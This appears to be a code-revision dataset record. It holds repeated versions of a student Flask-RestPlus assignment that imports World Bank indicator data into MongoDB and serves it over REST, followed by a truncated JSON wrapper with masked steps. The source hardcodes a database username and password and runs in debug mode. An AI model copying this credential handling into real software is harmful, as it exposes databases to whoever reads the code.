@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
<|reserved_special_token_0|>
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return (
f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'
)
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
def format_collection_entry(indicator_data):
return {'country': indicator_data['country']['value'], 'date':
indicator_data['date'], 'value': indicator_data['value']}
def query_to_index(query, arr_size):
try:
match = re.search('^(bottom|top)\\d+$', query).group()
order = re.search('^(bottom|top)', match).group()
length = int(re.search('\\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size - length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('q', help=
'Query param. Expected format: top<k> / bottom<k>, where k is between 1 and 100. Eg. top10, bottom40'
)
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return (
f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'
)
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
def format_collection_entry(indicator_data):
return {'country': indicator_data['country']['value'], 'date':
indicator_data['date'], 'value': indicator_data['value']}
def query_to_index(query, arr_size):
try:
match = re.search('^(bottom|top)\\d+$', query).group()
order = re.search('^(bottom|top)', match).group()
length = int(re.search('\\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size - length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
if __name__ == '__main__':
db = mlab_client(dbuser=DB_CONFIG['dbuser'], dbpassword=DB_CONFIG[
'dbpassword'], mlab_inst=DB_CONFIG['mlab_inst'], dbname=DB_CONFIG[
'dbname'])
app.run(debug=DEBUG)
<|reserved_special_token_1|>
#!/usr/bin/env python3
from flask import Flask, request
from flask_restplus import Resource, Api, fields
from pymongo import MongoClient
from bson.objectid import ObjectId
import requests, datetime, re
#------------- CONFIG CONSTANTS -------------#
DEBUG = True
MAX_PAGE_LIMIT = 2
COLLECTION = 'indicators'
DB_CONFIG = {
'dbuser': 'z5113243',
'dbpassword': 'badpassword01',
'mlab_inst': 'ds239071',
'dbname': 'cs9321_ass2'
}
#------------- API INITIALISATION -------------#
db = None # initialised in main
app = Flask(__name__)
app.config.SWAGGER_UI_DOC_EXPANSION = 'list'
api = Api(
app,
title='Assignment 2 - COMP9321 - Chris Joy (z5113243)',
description='In this assignment, we\'re asked to develop ' \
'a Flask-Restplus data service that allows a client to ' \
'read and store some publicly available economic indicator ' \
'data for countries around the world, and allow the consumers ' \
'to access the data through a REST API.'
)
indicator_model = api.model(COLLECTION, {
'indicator_id': fields.String(required=True,
title='An Indicator ',
description='http://api.worldbank.org/v2/indicators',
example='NY.GDP.MKTP.CD'),
})
parser = api.parser()
parser.add_argument('q', help='Query param. Expected format: top<k> / bottom<k>, ' \
'where k is between 1 and 100. Eg. top10, bottom40')
#------------- HELPER FUNCTIONS -------------#
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return 'http://api.worldbank.org/v2/countries/all/indicators/' \
f'{indicator}?date={date}&format={fmt}&page={page}'
# Recursively build an array containing indicator data
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or (len(response) <= 1 and response[0]['message'][0]['key'] == 'Invalid value'):
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0]['pages']:
return prevRes+response[1]
return get_indicator_data(
indicator=indicator,
page=response[0]['page']+1,
prevRes=prevRes+response[1],
max_pages=max_pages,
)
# Restructure indicator entry according to spec
def format_collection_entry(indicator_data):
return {
'country': indicator_data['country']['value'],
'date': indicator_data['date'],
'value': indicator_data['value'],
}
# Transform to top<k>/bottom<k> queries to array indexes
def query_to_index(query, arr_size):
try:
match = re.search(r'^(bottom|top)\d+$', query).group()
order = re.search(r'^(bottom|top)', match).group()
length = int(re.search(r'\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size-length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
#------------- QUESTION ROUTES -------------#
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
# Indicator hasn't been specified in body (400)
if not body['indicator_id']:
return { 'message': 'Please specify an indicator.' }, 400
# Retrieve indicator from database (200)
existing_collection = db[COLLECTION].find_one({'indicator': body['indicator_id']})
if existing_collection:
return {
'location': f'/{COLLECTION}/{str(existing_collection["_id"])}',
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator'],
}, 200
# From now onwards we need to obtain data from the Worldbank API
indicator_data = get_indicator_data(body['indicator_id'])
# Valid indicator hasn't been specified (400)
if indicator_data == 'Invalid indicator':
return { 'message': 'Please specify a valid indicator.' }, 400
# Create and retrieve indicator from Worldbank API (201)
collection = {
'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(),
'entries': [format_collection_entry(entry) for entry in indicator_data],
}
created_collection = db[COLLECTION].insert_one(collection)
return {
'location': f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']),
'indicator': collection['indicator'],
}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return { 'message': 'Unable to retrieve collections.' }, 400
return [{
'location': f'/{COLLECTION}/{str(doc["_id"])}',
'collection_id': str(doc['_id']),
'creation_time': str(doc['creation_time']),
'indicator': doc['indicator'],
} for doc in collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
    """Operations on a single collection, addressed by its Mongo ObjectId."""

    @api.doc(description='[Q2] Deleting a collection with the data service.')
    @api.response(200, 'Successfully removed collection.')
    @api.response(404, 'Unable to find collection.')
    @api.response(400, 'Unable to remove collection.')
    def delete(self, collection_id):
        """Remove the collection identified by ``collection_id``.

        Returns 404 when the id is malformed or unknown, 400 when the
        delete itself fails, and 200 on success.
        """
        # ObjectId() raises on a malformed id; previously that happened
        # outside any try-block and surfaced as a 500. Treat it as 404.
        try:
            oid = ObjectId(collection_id)
        except Exception:
            return { 'message': 'Unable to find collection.' }, 404
        # Check if collection exists
        if not db[COLLECTION].find_one({'_id': oid}):
            return { 'message': 'Unable to find collection.' }, 404
        # Remove collection from db
        try:
            db[COLLECTION].delete_one({'_id': oid})
        except Exception:
            return { 'message': 'Unable to remove collection.' }, 400
        return { 'message': f'Collection = {collection_id} has been removed from the database!' }, 200

    @api.doc(description='[Q4] Retrieve a collection.')
    @api.response(200, 'Successfully retrieved collection.')
    @api.response(404, 'Unable to retrieve collection.')
    def get(self, collection_id):
        """Return the full collection document, entries included."""
        try:
            collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
        except Exception:
            # Covers malformed ObjectIds and database errors.
            return { 'message': 'Unable to find collection' }, 404
        # find_one returns None (it does not raise) for a well-formed but
        # unknown id; without this check the subscripting below raised a
        # TypeError and the client got a 500 instead of a 404.
        if not collection:
            return { 'message': 'Unable to find collection' }, 404
        return {
            'collection_id': str(collection['_id']),
            'indicator': collection['indicator'],
            'indicator_value': collection['indicator_value'],
            'creation_time': str(collection['creation_time']),
            'entries': collection['entries'],
        }, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
    """Look up a single indicator entry by (collection, year, country)."""

    @api.doc(description='[Q5] Retrieve economic indicator value for given a country and year.')
    @api.response(200, 'Successfully retrieved economic indicator for given a country and year.')
    @api.response(400, 'Unable to retrieve indicator entry.')
    @api.response(404, 'Unable to find collection.')
    def get(self, collection_id, year, country):
        """Return the single entry matching ``country`` and ``year``.

        404 when the collection cannot be found, 400 when the collection
        exists but holds no matching entry.
        """
        try:
            collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
        except Exception:
            # Covers malformed ObjectIds and database errors.
            return { 'message': 'Unable to find collection' }, 404
        # find_one returns None (it does not raise) for a well-formed but
        # unknown id; without this check the 'entries' lookup below raised
        # a TypeError and the client got a 500 instead of a 404.
        if not collection:
            return { 'message': 'Unable to find collection' }, 404
        # Create a filtered list containing entries that match params
        filtered_entries = [
            entry for entry in collection['entries'] if entry['country'] == country and entry['date'] == year
        ]
        if len(filtered_entries) == 0:
            return {'message': 'Unable to find specific indicator entry ' \
                f'for country=\'{country}\' and year=\'{year}\'.'}, 400
        return {
            'collection_id': str(collection['_id']),
            'indicator': collection['indicator'],
            **filtered_entries[0],
        }, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
    """Rank a collection's entries for a year, optionally sliced top/bottom."""

    @api.doc(description='[Q6] Retrieve top/bottom economic indicator values for a given year.')
    @api.response(200, 'Successfully retrieved economic indicator values.')
    @api.response(404, 'Unable to find collection.')
    @api.expect(parser)
    def get(self, collection_id, year):
        """Return the year's entries, ordered by value when ``q`` is given.

        ``q`` (query string) is expected as top<k>/bottom<k>; when absent
        the entries are returned unsorted.
        """
        query = request.args.get('q')
        try:
            collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
        except Exception:
            # Covers malformed ObjectIds and database errors.
            return { 'message': 'Unable to find collection' }, 404
        # find_one returns None (it does not raise) for a well-formed but
        # unknown id; without this check the 'entries' lookup below raised
        # a TypeError and the client got a 500 instead of a 404.
        if not collection:
            return { 'message': 'Unable to find collection' }, 404
        filtered_entries = [
            entry for entry in collection['entries'] if entry['date'] == year
        ]
        if not query:
            return {
                'indicator': collection['indicator'],
                'indicator_value': collection['indicator_value'],
                'entries': filtered_entries,
            }, 200
        # Sort descending by value, then slice according to the top<k>/
        # bottom<k> query (query_to_index returns a slice object).
        return {
            'indicator': collection['indicator'],
            'indicator_value': collection['indicator_value'],
            'entries': sorted(
                filtered_entries,
                key=lambda k: k['value'],
                reverse=True
            )[query_to_index(query, len(filtered_entries))],
        }, 200
if __name__ == '__main__':
    # Open the mLab-hosted MongoDB connection before starting the server;
    # the module-level `db` handle is what every resource class queries.
    config = DB_CONFIG
    db = mlab_client(
        dbuser=config['dbuser'],
        dbpassword=config['dbpassword'],
        mlab_inst=config['mlab_inst'],
        dbname=config['dbname'],
    )
    app.run(debug=DEBUG)
|
flexible
|
{
"blob_id": "75958b48a3372b56e072a0caa468171ab6b99eb6",
"index": 8917,
"step-1": "<mask token>\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. 
